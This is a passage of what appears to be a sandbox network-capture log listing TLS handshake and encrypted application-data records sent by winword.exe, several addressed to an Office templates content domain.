  456. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\xefi\\xa0\\x06&\\xe3\\xb4\\x017q\\xbc\\xd2\\xec\\xde\\xe6\\x11s\\x0c\\xa5\\xca\\xf9\\x0b\\xa4\\xc9\\x13|n\\x9a#?\\xfd\\x89\\x7f\\x87 \\xa0\\xfe\\xe3\\x82\\x91=\\xb3\\xe8\\x0e\\xeb\\xc4\\x87o\\xee\\xb0\\xd4\\x15|/~\\x1f\\x896\\x91\\xc0\\xf5'5\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\xae)\\xdb\\xdfx\\xd2\\x81\\xf2\\xfe\\x0c\\x95k-\\x83\\x9b\\xee$\\xc6\\xe4\\xe6y\\xc2\\xa4\\xe4ur|qn\\x0c\n\\x8e\\xed\\xa6f\\xc0\\xd1m\\x84n\\xed\\xbf\\x18\\x94\\xb3d\\x08"
  457.  
  458.  
  459. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\xbar\\x0c\\xbe\\x15l:\\xde\\x9d\\xe7\\xf1\\xf5\\xe9u7 \\x06\\xd7l\\xf9\\xbb\\xfe\\x8f\\x1am\\x82a\\xfbv\\x16\\xb1e_\\x88\\x97\\xc52\\x967h`\\x0f\\xdb\\x87\\xa0\\x06\\xee\\xd2lxn\\xff\\xbf\r^\\x0c\\xf5\\xbd\\x8e\\x7f\\xbb\\xc4\\xbaz\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000o\\xd2p\\xaa_o\\xee\\xf5\\x817\\xd1y\\xf6\\xc3y;\\x07\\xcd:\\xf7\\xd6\\xf0a\\xd6\\xe1\\xec\\xad\\xf8\\x96\\x8b0o\\xab\\x05\\xfc\\xc627d\\x12\\xde\\x02\\x86m\\x89\\xf6\\x86\\xf9"
  460.  
  461.  
  462. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04?\\xdd\\x84\\x13\\xf5\\x01\\xa5u\\xd2uv\\x96\\xb1 \\xe5\\xa7\\x9e\\x82ng\\x84q9\\xac\\x10\\x9e\\xc4g\\x137\\xbc\\xc4\\x90\\x95\\xbc\\xf1\\xf1(\\xbe\\x18\\xe1\\xd6g\\xa4i\\xf4_\\xe8\\x10\\x91\\xc3\\xbeo\\xa5\\xb4\\x8b\\xf5~\\xe3\\x9f\\x8fw2\\x85\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\xf9o!\\xcc\\x82\\xf5\\x07d\\ w\\xbfb\\xeb\\x01\\xe7\\xe6\\xca\\x9e;\\xa4\\xc4\"r\\xa2$y\\xde\\xc74\\xa9\\xb3\\xab\\xb6>\\x93\\xe2\\xb9\\xa7\\x96u\\x90\\xa3\\xa99zk"
  463.  
  464.  
  465. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\xf2\\x1a\\xe8\\x81\r\\xd2dr\\xecjs)\\xd7\\x92$\t\\x03\\x8b\\xbeo\\xd5\\x1e\\xd2\\xf0\\x01\\x95\\xfa\\xe4d%do\\x9c\\x8c\\x90\\xb3\\xe17c\\xae'\\x9d^\\x01\\xe4\\xc0\\xca\\xd4p\\x87x\\xadl0\\xea\\xb8\\xf3\\xeap\\xb1\\xb6\\x1e\\xe0\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\x1e\\x96g\\x11\\x95\\xbb.c7q\\x9fh\\x9f\\x12\\x0c\\x1c\\x1e\\x05b\\xa7\\xcc\\x14\\x80\\x9d\\xf6\\xf5\\x9ay\\x00qog\\xac\\xbf\\xa8\\x87\\xdb\n\\xbdey\\xfd\\x18-o\\x98"
  466.  
  467.  
  468. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\x94\\xcb<\\x9fb\\xf4\\x91\\xa5f\tm\\xcc+\\x1f\\xb3\\xcf\\x01\\xd2j\\x85\\xf4\\xde\\x8a?\\xbf\\x16\\x1ds:+\\x16\\x8em\\xaa?fx\\xa7\\xb5<\\xe0\\xd9\\x84@\\xec\\xe2\\xde\\xf0w\\x9f\\xbdcm_^\\xf2\\xcd\\x92\\x82z\\xe3\\xd0+\\x97\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\xc8\\xff\\x02\\xad\\xe5\\x11\\x8bm)s=\\xbf\\x8ezaqpyp\\x0f\\xf16\\x05am*l\\x8c\\xd8\\xe8\\xf2\\xa7\\\\xbb\\xd2p*\\x9c\\xfc\\xf02\\xf8\\x8bs\\xa1\"\\x85\\xfe"
  469.  
  470.  
  471. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\xb2\\x9fj|\\xd8x\\xb1\\xf3_w\\x87\\x93\\xa9n<\\xb9\\x1d\\x94.:\\xbc\\x0f\\xb8b\\xef\\x87\\xe5p\\xc8\\xbb\\xbb\\xb0\\xd6\\xfd\\xbb\\x1dh\\x8ex\\xdd\\xc2f\\xd2\\x03\\!\\xee\\8\\xbe\\x81\\xe5\\x8b(\\xf1\\xc4\\xa7\\xdah\\xe6o\\x15\\xb2\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\x95\\xc5\\xd9\\x8e\\xf3lr\\x8c\\x0er\\x9d\\xb7\\xa0k\\xe3\\xe7\\xa3\\x932\\xaa\\xc2\\x99s\\xa9\\xeb\r\\xf4\\xb6`j\\x90f:9\\xf1\\xb3\\x82\\xa9:\\xe5\\x05\\xcf\\xed\\xc92\\x0f\\x1cc"
  472.  
  473.  
  474. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010pb\n\\xba\\x82\\xd5\\xe2\\x91u\\x1d\\x02\\x9d\\x81\\x0c\\x0c\\xe1o%\\x84\\x97\\xa3\\xd31a\\xa6\\x15\\xc4\\xf9\\x91j\\xe7bdu\\xd9pwid\\xfd\\xfd\\xdea\\xd0\\xb4\\%\\xca&\\xc8\\xc9g\\\\xa5\\x91\\x80^h\\xbeq\\xb274v\\xf8\\xd4e3e\\x83\\xb7\\x12+=\\xf9+\\x03\r\\x7f\\x87@$\\xf4\\x9bdll\\xe0\\xcf\\x89\\x0cp\\xc1\\xf4\\x8c\\xb39\\x1e!\\x08hkf\\xc6q\\xb9x\\x94aa\\xb0\\xa8f\\xba\\x90\\x1f\\xaeh\\xc3\\xc8\\x01\\xb0\\x80\\x95\\x85\\xaft\\xbd\\xb4\\x96\\x98\\xc3\\xe9\\x98t\\x13q\\xcb\\xe2\\xeb\\xcc\n(c\\x1e\\xb4\\xec\\x03\\xc6?a\\xa5zj,y\\xd2\t|\\xe4 \\xce\\x10\\x02\\xf3q\\xe7c\\xf51\\xa9\\xc0\\\\xd2\\xfd\\xd1\\xb4v\\xf9f6a\\m<!\\xb3\\xa3\\xb4\\xc7\\x9e\\xd8\\xb7>m\\xb3\\xc93$\\x87\\xdb\\xcb1zn\\xb0\\x0b\\xe0\\x17>\\xbb\\xffj:\\x8c~e,\\xb5\\x1b\\xf8r\\xe2?\\x02\\xd1\\xd5i\\xc4\\xb7\\x82n\\x83\\xde\\x8a\\xe2\\xdb\\x01\\xdd\\xb29\\xea\\xd3\\x01at\\x1d\\xcc"
  475.  
  476.  
  477. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01h\\x81\\x93\\x05\\x08z\\x984\\xac\\xea\\xb1k\\xfa\\x14\\x9c\r\\xd2\\xe2\\x9b\\x85d\\x90gp\\xd3\\xb5\\xb2\\xa5\\x1bn\\xaf\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  478.  
  479.  
  480. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010f\\xdb)#2\\x98*\\x06s\\x86\\x98q\\xbf\\x94\\x0f\\x03\\xc9\\xb5\\xa0lo\\xd2\\x17\\x80\\xeb\\x9f\\xd7\t\\x1e\\xa9\\xe9\\x0c\\xd34\\xef\\x80\\xa0\\xa5\\xf3^\\xe9\\xab\\xa0 \\x01\\xdb\\xffp\\xb0\\x03\\x91\\xfb\\x0e%\\x99\\x11\\xf1\\xd89\\xf4\\xef\\xf8:7\\x8f!-\\xc8'|\\x9ea\\xef\\x06\\xf1$\\xda\\xd9\\xa1j\\xc4\\xaf\\xedgw\\xbf\\xbb\\x9c1r\\\\xb2-\\xcd\\xed\\xff\\xdb\\x9e_\\xb55y(\\xe8\\xce:\\x0en\\xad\\x82\\xf4\t\\xd9\\x95\\xe1\\x9c6\\xf7\\x8e\\xe1\\x11\\x1b\\x07\\xb4\\xd7\\xbck\\x82-h\\x99\\xda\\x98\\xcay\\x03\\x8d\\x0cm\\xf2r\\x1d\\xdc\\xa4\\xedz(h\\x9c\\xc8o\\x8e\\x9d\\xd3\\x94\\xefmj$*\\xec\\xc0\\xe4\\x17q\\xe4e\\xe9\\xd8\\x8f!\\x02+\\x96\\x0f\\xed)\\x0e\\x9aw\\x83\\xd3\\xfd\\x8a\\\\xf1\\xb2\\x822\\x03d\\x96\\xac\\xd5kw\\xb7k*\\xb5\\xcc\\xcc\\x14\\xa6~m>/7\\xc6\\xedosst\\xafq\\xb2vw\\x87%bg_gubt\\xe0\\xbf\\xec%p-\\xa1\\x02\\xe0t\\x8f\\x99a\\xd8-\\x12f\\x04\\xf8\\xfa\\xf2"
  481.  
  482.  
  483. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010\\xc5\\xb6x\\xf1\\xfd*_\\xb0\\xaf1\\x8bd\\x04\\xa5x\\x8f\\xbc\\x90\\xeb=\\xf5h\\xdc\\xd7\\x1f\\x9b\\xb5@\\x86t\\xfe\\x19hf\\xbb\\x03\\x8f\\x8f\\x85m>z\\xd2\\x86rb\\xd6\\x12\\xd2\\xc3$pp\\xa9\\xc8\\xb1=\\xa8\\x0e\\xe2\\xe7k\\x85c\\xcd\\xf2\\x10\\xb2\\xc84\\xe40\\x95o\\x0f\\x13\\x9de\\x05\\x1c\\x0b0d\\x01l\\x90\\xf5\\xbe\\xfb\\x10\\xf8y\\xfcw\\xcf\\x85\\xee\\x89\\xa8\\xfd-f2\\x0f\\x1f\\xe7*\\xee^\\xf0\\xc6\\xe1i\\x9f\\xcec1r\\xd5\\x9d8\\x83=\\x8ea>f:\\xd3\\xc3\\x189vf\\xb9?\\x90\\x0c\\xdf4\\xb2\\xa2\\x8a\\xbbu\\xc2h\\x89\\x05-\\xe7\\xbbv\\xa5\\\\x0eri@\\xf4\\xb2\\x83\\x10\\x02\\x1e.f\\xb3x0w\\x06\\x83\\xa3\\xbc7i\\x0cg\\xd2\\xb7\\x8c\\xe09\\x06\\x89\\x86\\xc4\\x88w$s\\x1d\\xda\\xb4\\xe2r\\x9e/g\\x97\\xfb\\x9a\\xdbi\\xff\\x05e\\xab:t\\xd1\\x9d\\xbd\\x85\\xf7\\xaat\\x9c\\xfbl\\xc4\\xa4s@?\\x9dmkh\\xdf %r\\x8c~\\xda+\\xdc\\xbe\\xb8\\xae\\x8e>\\xae\\x87v\\x03\\xbb"
  484.  
  485.  
  486. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010\\xa3\\x05nx\\xb7\\x1b\\x1c\\xe2(\\x9f\\x87\\xf8\\x92|\\xab\\x8al\\xc5m\\xb5\\xf1\\x84^\\x8f\\x05\\x1f\\x04\\xc4\\xdcr\\xda\\x815\\x96\\xdc\\x99\\x1c\\x11\\xe4\\xf2\\xbfx\\xd6\\xe0\\x88`\\x1d=\\x86\\x99e8<\\xc9\\xabn\\x02\\xbe\\xf1\\x01h2\\xf7\\xa3x\\xe2\\xf8mws%\r\\xc9'5\\xb06\\x19\\xb5\\xe6\\x82\\xeen\\xff\\xb3\\xf7\\xc9it\\x06f\\xdf\\x9d0h\\xcb\\xd02\\xe6\\xeay\\x06\\x18y\\x8c\\xb3e8\\x8a\\x1c\\xbb\\xdb\\x06f\\xc59\\xaa\\x8bh\\x7f\\xc7!\\x8f\\xffd\\xbe\\xf1\\x0f\\x7fs\r\\xac\\x97o\\x8f\\xcegw4md\\x88&\\xb4m\\x8fyi\\xb1\\x9d\\xe4j\\x94\\x8b\\x85q\\x86\\x00\\x98-\\xde\\xbb\\xbb~f\\x86dg\\xcadi\\xefhz\nq\\x8a\\x99*a\\xd3e\\xd8\\xff\\x98\\x1f\\x98\\xce\\xb9\\xcb\\x0c\\xe6\\x8c\\xc7\\x1equ\\xd4\\\\xfdr\\x01+\\xa4\\xbft\\xc1\\xc6\\xda\\xda\\x8b$\\x7f\\x9a\\xf1,\\xee\\x1d\\x95\\x06\\xa8\\x1e\\xb7\\x8fc\\x1ay,\\xf8v\\xf1o\\x94\\xf5y\\xb9\\x10\\\\xbf\\x0c3\\xf3\\x08b9\\xf4\\x16v"
  487.  
  488.  
  489. "http_request": "winword.exe_WSASend_`\\xa4i\\x0f\\x08~e\\x0fm\\x1a\\xd4 b\\xe4l\\x91\\x9cm\\xf5\\xf0\\xee\\x9e\\xb8e\\x8e\\xec\\x1dl\\xd6\\xe3\\xc3\n\\xd5\\xad\\xfc\\x86:sav\\xce\\x11\\xedl\\x02\\x9d\\xcc\\xd4\\xe8'\\xbb\\xff\\xd8\\xe7\\x9d\\x1f\\x89\\x97\\xe6?\\xacwu\\xcb%\\xac\\x01\\xdfd\\x98b'\\xb2pw\\xd2\\xad\\x88\\x9e\\xb8\\xfb\\x14\\xf4\\x92\\x02\\x1bu9\\xfdp\\xaf\\xcf\\x95\\x92m\\x94\\x89\\x1e\\xde\\xef\\x08(\\xd5\\x9d\\xd0\\xd3\\xd2ayp\\xc7\\xd5?k\\xc0\\xa2\\xc7\\x93?\\x07\\xef*\\xab\\xcb\\xe0\\x95\\\\xe4(!=\\xb4\\xdf\\x15@\\xd3!;\\xd9ec\\x8e*\\xcd\\xb5\\xc7\\xb1\\xbcwg1b!\\x9f\\xffr\\xd5\\x9fg\\xd6o>\\xec=\\xa0\\xa8h6i\\xe2j\\x85\\xed\\xb6\\x04c\\xa1\\x12\\xb6\\xaa\\xa7\\x19j\\xca\\x7f\\xb0\\xf7\\xd3h\\xe7<w\\x1f\\x1a\\xac\\xa5\\x96\\x0e\\x0e\\x11\\x04\\x96\\xc0\\xd8\\x87\\x87\\x1c\\x0f\\x8c\\x05\\xd7\\x8d\\x81\\x006\\xa5\\xf3h\\xa1p|.s\\x02-1\"\\x83\\xb3~\\xb8\\xc2\\xad\\xe9\\xcb\\xa16n\\xc7\\xd9\\xcb\\x9f\\xeb )8+p\\x05?\\xb1\\xa57"
  490.  
  491.  
  492. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01h\\x81\\x93\\x97e\\xad\\xb7cgm\\x16g:%\\xb8\\xa8\\x0e\\xd4\\x97\\x0fl\\x10r\\x1d\\x84~\\xeeta^\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  493.  
  494.  
  495. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01h\\x81\\x93\\x93\\x8a\\x90\t=\\xa9\\xc7\\x90\\xef\\xf7\\x03\\x10\\xdb\\xa5s\\x0b\\xc5/+\\xa9\\xd2\\x87_-\"ew\\xcc\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  496.  
  497.  
  498. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01h\\x81\\x93\\xd7\\x80.vi\\xbaoa\\x81\\xf44\\xb8m\\xa4\\xb46\\x89\\x0b\\xc5a\\xda\\xe6\\xb7\\xc5\\xa6'\\xcdd\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  499.  
  500.  
  501. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01h\\x81\\x93\\xf7\n*a\\xa1\\xa4\\xcc\\x0e\\xbc\ns\\x032\\xc2\\xd2?\\x16g\\xff\\x1b\\xa9\\xc1\\xee\\xd3\\xe0\\xc9\\xf6\\x81\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  502.  
  503.  
  504. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01h\\x81\\x93\\x0eg7c\\xce\\xfaz\\xf9\\x9d0\\x89s\\xf6\\xb4\\xcf\\xdb\\xf68v\\xa9\\x9b`s_*\\xb0\\xf7\\xeb\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  505.  
  506.  
  507. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01h\\x81\\x94\\xc0*\\xfe\\xc3\\xe6\\x88t\\x06f\\xfc!9\\x97\\xf5\\x84\\x04\\xcd\\xf2\\xe3b\"\\xdc!\\x0c\\x12\\xd8\\x18p\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  508.  
  509.  
  510. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01h\\x81\\x94\\xfc\\xec\\xd4\\x18\\xb8\\xb0\\xdd\\x81\\xb1\\xcc\\x8a\\x1b\\xaak\\xab\\x85\\xac@(\\xc5\\xbc,\\\\xad~f\\xfc\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  511.  
  512.  
  513. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01h\\x81\\x94\\xa8.\\xe3\\x8d\\x1c)\\x1b\\xf1#\\xd3\\x8f\t\\xb3c\\xd8\\xe7\\xd18uf\\xe9ba\\x14a\\x8bm\\xad\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  514.  
  515.  
  516. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01h\\x81\\x94\\xd7\\xca\\xf3;\\xfby>\\x95\\x8b\\xda\\xbf\\xd4'!\\xfd-\\x16\\x81=\\xa8\\x96paw\\x15_\\xb9j\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  517.  
  518.  
  519. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01h\\x81\\x94fh\\x8e\\x80\\xb0\\xbe\\xba0t\\xa4=\\x19\\x8f\\xe50v\\x9a\\xa2\\x0e\\xaa\\xf0\\x89c\\xf9,\\x1by\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  520.  
  521.  
  522. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01h\\x81\\x94\\xf8c\\xd0\\xb9h5\\xc5)\\xab\\x93\\xb4y\\xefx\nvx\nm\\xa79+\n\\xa9\\x81\\xcf\\x1a\\xcb\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  523.  
  524.  
  525. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01h\\x81\\x94\\x10\\xabj\\xd9\\x17\\x1d6(\\xc4=;\\xca\\x87\tc\\xd3\\xfc+\\x80\\x977\\xb9\\xbfcf\\xfc&a\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  526.  
  527.  
  528. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01h\\x81\\x94&0i\\xd5b\\x89\\x1f3\\xb6\\xc9\\xe3\\xf0\\x8e6\\xf1\\xd5\\xb0\\xe9\\xdcc\\xe3p\\xadg\\x05tt\\xbc\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  529.  
  530.  
  531. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01h\\x81\\x94\\x03\\xaa\\xf5\\xc8\\xe7\\x87\\x0es\\xdb\\x9d\\xc1:\\x92\\xb9~d\\x02\\xa3\\x89\r\\xffal\\xa6\\x06=\\xb2\\x03\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  532.  
  533.  
  534. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01h\\x81\\x94f\\xf6\\xbe\\xbfl\\x1ag/\\xb4l\\xb0%c\\x894q\\xff\\x16\\xc8\\xf6p\\xb1x`j\\x1by\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  535.  
  536.  
  537. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01h\\x81\\x94\\xcf\\x19%:\\xc6\\x8b3\\xd5\\xc4p\\x04q\\xe1?\\x08t\no\\x9e+\\xb7\\xf7\\xd2h\\xbb\\x15\\xba\\xbe\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  538.  
  539.  
  540. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\x91\\xc1\\xd4\\xc7\\x02tx\\x81\\xa7<\\xb69\\x13\\xf1)l\\x94\\xac\\x96\\xb6\\x85\\xda\\x05\\x9c\\x7f\\x8c\\xc8\\xba\\x15\\x9d\\x84\\xdf\\xab\\xee\\xaf\\xa1\\xa4\\x80\\x10\r\\xb1\\xf1\\xa8\\x01\\xc57\\xfc\\xd2ni\\xb1\\x02\\xe9y\\x17\\x01\\xcdrx\\xda\\xf2\\x06\\x02\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\x846\\x00\\xd7\\x0e\\xcb\\x89\\xb8m\\x83\\x07+\\xe0\\xbd\\xfc\\x1c,i\\x1f\\xa1\\x17x\\xdd\\x07b\\xff\\xf4\\xfd\\xb8\\xde\\xff\\x02\\xee\\xbf\\xfa\\xae\n?\\xa2^\\x81\\xd5\\xc7\\xaclqt\\xaa"
  541.  
  542.  
